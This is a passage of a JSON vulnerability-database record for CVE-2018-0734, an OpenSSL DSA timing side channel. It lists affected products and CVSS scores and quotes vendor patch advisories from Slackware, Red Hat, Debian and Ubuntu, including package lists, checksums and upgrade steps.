"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "6.8.1", "versionStartIncluding": "6.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "8.8.1", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "10.12.0", "versionStartIncluding": "10.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "6.15.0", "versionStartIncluding": "6.9.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "8.14.0", "versionStartIncluding": "8.9.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:10.13.0:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "11.3.0", "versionStartIncluding": "11.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:cn1610_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:cn1610:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:steelstore:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:santricity_smi-s_provider:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql_enterprise_backup:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "3.12.3", "versionStartIncluding": "3.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql_enterprise_backup:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.1.2", "versionStartIncluding": "4.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_professional_project_management:15.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_professional_project_management:18.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:tuxedo:12.1.1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_professional_project_management:16.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:e-business_suite_technology_stack:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_professional_project_management:15.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_professional_project_management:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "17.12", "versionStartIncluding": "17.7", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:e-business_suite_technology_stack:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_professional_project_management:16.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:e-business_suite_technology_stack:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_professional_project_management:8.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2018-0734" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat,Samuel Weiser.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1435" } ], "trust": 0.6 }, "cve": "CVE-2018-0734", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-118936", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2018-0734", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" } ], "severity": [ { "author": "NVD", "id": "CVE-2018-0734", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201810-1435", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-118936", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2018-0734", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-118936" }, { "db": "VULMON", "id": "CVE-2018-0734" }, { "db": "CNNVD", "id": "CNNVD-201810-1435" }, { "db": "NVD", "id": "CVE-2018-0734" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The OpenSSL DSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.1a (Affected 1.1.1). Fixed in OpenSSL 1.1.0j (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.0.2q (Affected 1.0.2-1.0.2p). The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. The vulnerability stems from incorrect use of relevant cryptographic algorithms by network systems or products, resulting in improperly encrypted content, weak encryption, and storing sensitive information in plain text. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.2q-i586-1_slack14.2.txz: Upgraded. \n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0734\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1u-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1u-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1u-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1u-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2q-i586-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2q-x86_64-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.1.1a-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.1.1a-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.1.1a-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.1.1a-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\ne6d4b3a76383f9f253da4128ba23f269 openssl-1.0.1u-i486-1_slack14.0.txz\nc61d31a1751ae39af89d3fee0b54f0d8 openssl-solibs-1.0.1u-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n96be19e6a96c9beb5d3bbc55348fb483 openssl-1.0.1u-x86_64-1_slack14.0.txz\nb7a8fa2ebd16c8ae106fc1267bc29eca openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n099b960e62eaea5d1a639a61a2fabca7 openssl-1.0.1u-i486-1_slack14.1.txz\nb5d5219e05db97f63c4d6c389d6884fb openssl-solibs-1.0.1u-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nfc96c87d76c9d1efd1290ac847fa7c7c openssl-1.0.1u-x86_64-1_slack14.1.txz\ne873b66f84f45ea34d028a3d524ce573 openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz\n\nSlackware 14.2 packages:\nd5f0cc19451e9c7e3967820cf02a20c6 openssl-1.0.2q-i586-1_slack14.2.txz\n594ca80447baecd608a51083b12a26d9 openssl-solibs-1.0.2q-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 packages:\n943bb2f3259ccf97a1b8b25f5f511c30 openssl-1.0.2q-x86_64-1_slack14.2.txz\n0d45afe2487c47b283c06902c56e4559 openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz\n\nSlackware -current packages:\n6f01f6dd0f40a12e473320386cfc8536 a/openssl-solibs-1.1.1a-i586-1.txz\n6e5a2ab2475a0d851376d12911b3c6b7 n/openssl-1.1.1a-i586-1.txz\n\nSlackware x86_64 -current packages:\neb4697703f1f4b81ad38e9247ab70dac a/openssl-solibs-1.1.1a-x86_64-1.txz\n12a10fd6bd2344b3e73106c8d5b9828c n/openssl-1.1.1a-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.2q-i586-1_slack14.2.txz openssl-solibs-1.0.2q-i586-1_slack14.2.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Description:\n\nThis release adds the new Apache HTTP Server 2.4.37 packages that are part\nof the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack\nApache Server 2.4.29 and includes bug fixes and enhancements. After installing the updated\npackages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):\n\n1568253 - CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys\n1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm\n1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash)\n1668493 - CVE-2018-17199 httpd: mod_session_cookie does not respect expiry time\n1668497 - CVE-2018-17189 httpd: mod_http2: DoS via slow, unneeded request bodies\n1695020 - CVE-2019-0217 httpd: mod_auth_digest: access control bypass due to race condition\n1695030 - CVE-2019-0196 httpd: mod_http2: read-after-free on a string compare\n1695042 - CVE-2019-0197 httpd: mod_http2: possible crash on late upgrade\n1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption\n1741860 - CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service\n1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service\n1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service\n\n6. \n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.1.0j-1~deb9u1. Going forward, openssl security updates for\nstretch will be based on the 1.1.0x upstream releases. \n\nFor the detailed security status of openssl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openssl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlwBuAcACgkQEMKTtsN8\nTjZbBw/+MOB5+pZbCHHXyH3IeD+yj+tSPvmNc3SCwdEtUxGXr0ZX7TKHfaLs/8s6\nUdto0K8a1FvjrcUQCfhnFpNcSAv9pxX13Fr6Pd560miIfAu9/5jAqiCufCoiz+xj\n45LNJGlaxxaFjgBGCitZSJA0Fc4SM6v5XFyJfR3kChdQ/3kGQbbMNAp16Fy3ZsxJ\nVXwviomUxmmmdvjxyhifTIpuwr9OiJSQ+13etQjTDQ3pzSbLBPSOxmpV0vPIC7I2\nDwa4zuQXA/DF4G6l8T4rXCwCN4e4pwbTc8bbCjXeZK+iVAhnRD6wXlS3cc5IVAzx\n/qTa89LZU8B6ylcB6nodeAHLuZTC3Le8ndoxYz5S2/jHZMM/jCQNHYJemHWNbOqn\nq+e5W0D1fIVLiLoL/iHW5XhN6yJY2Ma7zjXMRBnkzJA9CTNIKgUjrSFz0Ud+wIM/\nu8QhNPwZ0hPd5IfSgIyWqmuQ5XzFYqAQvwT1gUJiK7tIvuT0VsSyKVaSZVbi4yrM\n9sxkZaP1UNLcTVCFw6A0KFwhb9z6kQtyH1MRkFPphmnb8jlHA3cTdPJkFUBi3VaT\n7izThm5/mVLbAjZ8X7nkqnzWzmc885j0ml3slDd/MOVWB5CD3vFAcI8k3VZr3A61\nP2gNSN6UbAbLMGsxgs3hYUHgazi7MdXJ/aNavjGSbYBNL780Iaw=3Qji\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Low: openssl security, bug fix, and enhancement update\nAdvisory ID: RHSA-2019:3700-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:3700\nIssue date: 2019-11-05\nCVE Names: CVE-2018-0734 CVE-2018-0735 CVE-2019-1543 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nThe following packages have been upgraded to a later upstream version:\nopenssl (1.1.1c). \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.1 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1644356 - CVE-2018-0735 openssl: timing side channel attack in the ECDSA signature generation\n1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm\n1668880 - ec man page lists -modulus but the tool doesn\u0027t support it\n1686058 - specifying digest for signing time-stamping responses is mandatory\n1686548 - Incorrect handling of fragmented KeyUpdate messages\n1695954 - CVE-2019-1543 openssl: ChaCha20-Poly1305 with long nonces\n1697915 - Race/segmentation fault on process shutdown in OpenSSL\n1706104 - openssl asn1parse crashes with double free or corruption (!prev)\n1706915 - OpenSSL should implement continuous random test or use the kernel AF_ALG interface for random\n1712023 - openssl pkcs12 uses certpbe algorithm not compliant with FIPS by default\n1714245 - DSA ciphers in TLS don\u0027t work with SHA-1 signatures even in LEGACY level\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nopenssl-1.1.1c-2.el8.src.rpm\n\naarch64:\nopenssl-1.1.1c-2.el8.aarch64.rpm\nopenssl-debuginfo-1.1.1c-2.el8.aarch64.rpm\nopenssl-debugsource-1.1.1c-2.el8.aarch64.rpm\nopenssl-devel-1.1.1c-2.el8.aarch64.rpm\nopenssl-libs-1.1.1c-2.el8.aarch64.rpm\nopenssl-libs-debuginfo-1.1.1c-2.el8.aarch64.rpm\nopenssl-perl-1.1.1c-2.el8.aarch64.rpm\n\nppc64le:\nopenssl-1.1.1c-2.el8.ppc64le.rpm\nopenssl-debuginfo-1.1.1c-2.el8.ppc64le.rpm\nopenssl-debugsource-1.1.1c-2.el8.ppc64le.rpm\nopenssl-devel-1.1.1c-2.el8.ppc64le.rpm\nopenssl-libs-1.1.1c-2.el8.ppc64le.rpm\nopenssl-libs-debuginfo-1.1.1c-2.el8.ppc64le.rpm\nopenssl-perl-1.1.1c-2.el8.ppc64le.rpm\n\ns390x:\nopenssl-1.1.1c-2.el8.s390x.rpm\nopenssl-debuginfo-1.1.1c-2.el8.s390x.rpm\nopenssl-debugsource-1.1.1c-2.el8.s390x.rpm\nopenssl-devel-1.1.1c-2.el8.s390x.rpm\nopenssl-libs-1.1.1c-2.el8.s390x.rpm\nopenssl-libs-debuginfo-1.1.1c-2.el8.s390x.rpm\nopenssl-perl-1.1.1c-2.el8.s390x.rpm\n\nx86_64:\nopenssl-1.1.1c-2.el8.x86_64.rpm\nopenssl-debuginfo-1.1.1c-2.el8.i686.rpm\nopenssl-debuginfo-1.1.1c-2.el8.x86_64.rpm\nopenssl-debugsource-1.1.1c-2.el8.i686.rpm\nopenssl-debugsource-1.1.1c-2.el8.x86_64.rpm\nopenssl-devel-1.1.1c-2.el8.i686.rpm\nopenssl-devel-1.1.1c-2.el8.x86_64.rpm\nopenssl-libs-1.1.1c-2.el8.i686.rpm\nopenssl-libs-1.1.1c-2.el8.x86_64.rpm\nopenssl-libs-debuginfo-1.1.1c-2.el8.i686.rpm\nopenssl-libs-debuginfo-1.1.1c-2.el8.x86_64.rpm\nopenssl-perl-1.1.1c-2.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-0734\nhttps://access.redhat.com/security/cve/CVE-2018-0735\nhttps://access.redhat.com/security/cve/CVE-2019-1543\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.1_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXcHzTdzjgjWX9erEAQjP6w/8D4eIfwgPbpKXdy3Y2kjmKhb9faqBJvHm\neqpG5tewJQBtRAPm/R7SesrMVKGUEDAuiSKydQlQn8nuRIWDsKw14+uLRN7AyTQ3\njXy0pnp+C7O1hyJnwNEiXo9ZgUaXMMXLGyTk8v9gnzA/HYpZX1c4g4FXHf0ycBi/\nthxllEiJx6CrEO3pszYzu1Lt9GFMOAJPvwbiW0S7mVmsNCI4n+5OfeNzmURXdObs\n89/XCFrQO3CDAh3SXCZa08Ie8px7Aq8slmNWOswhlqIYkUWGUbICIpqW1+4XyAqz\nhVP8iqTY7TRwBPB0zoqmO5cxMY+jqMk/LphG+oTOF+ZA7YZH3bjDxJisCOr+ys+i\nWnTYAl1KFBqo5uhH4dBzNH2EE5PeiwKNKqu6Wws1qOblTFXb3AYSHsqLv6VB0m1B\nMXcUXrjSMwelSVAgK1eekJsYqCr3lT1+N8cA8P/sgT/DzGTNJhcoCE/OeJCUVBZL\nuGhke48CUs3GvXCKP0+PDpINRRllGwVqkkCQ7LtsXoB0hGaaGt+CNCd3aQj8rf02\nmPi2Vab7CjBLUn1QGiNigLF4X4rKZlxiBcHDByyHdeCW+zHvGod7ksmJKXmHujvY\npdg6toj/our0hhQp2dPTXFPKFtkO7GIIe19i+OZ6Rn0niVxSQbshiXyFFsvgZN0F\n82vSbeKouJA=\n=mdzd\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-3840-1\nDecember 06, 2018\n\nopenssl, openssl1.0 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.10\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. (CVE-2018-0734)\n\nSamuel Weiser discovered that OpenSSL incorrectly handled ECDSA signing. This issue only affected Ubuntu\n18.04 LTS and Ubuntu 18.10. (CVE-2018-0735)\n\nBilly Bob Brumley, Cesar Pereida Garcia, Sohaib ul Hassan, Nicola Tuveri,\nand Alejandro Cabrera Aldaya discovered that Simultaneous Multithreading\n(SMT) architectures are vulnerable to side-channel leakage. This issue is\nknown as \"PortSmash\". (CVE-2018-5407)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.10:\n libssl1.0.0 1.0.2n-1ubuntu6.1\n libssl1.1 1.1.1-1ubuntu2.1\n\nUbuntu 18.04 LTS:\n libssl1.0.0 1.0.2n-1ubuntu5.2\n libssl1.1 1.1.0g-2ubuntu4.3\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.14\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.27\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nDue to the low severity of this issue we are not issuing a new release\nof OpenSSL 1.1.1, 1.1.0 or 1.0.2 at this time. The fix is also available in commit 8abfe72e8c (for 1.1.1),\nef11e19d13 (for 1.1.0) and commit 43e6a58d49 (for 1.0.2) in the OpenSSL\ngit repository. \n\nAs a result of the changes made to mitigate this vulnerability, a new\nside channel attack was created. The mitigation for this new vulnerability\ncan be found in these commits: 6039651c43 (for 1.1.1), 26d7fce13d (for 1.1.0)\nand 880d1c76ed (for 1.0.2)\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20181030.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2018-0734" }, { "db": "VULHUB", "id": "VHN-118936" }, { "db": "VULMON", "id": "CVE-2018-0734" }, { "db": "PACKETSTORM", "id": "150437" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "155160" }, { "db": "PACKETSTORM", "id": "150683" }, { "db": "PACKETSTORM", "id": "169667" } ], "trust": 1.71 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-0734", "trust": 2.5 }, { "db": "TENABLE", "id": "TNS-2018-17", "trust": 1.8 }, { "db": "TENABLE", "id": "TNS-2018-16", "trust": 1.8 }, { "db": "BID", "id": "105758", "trust": 1.8 }, { "db": 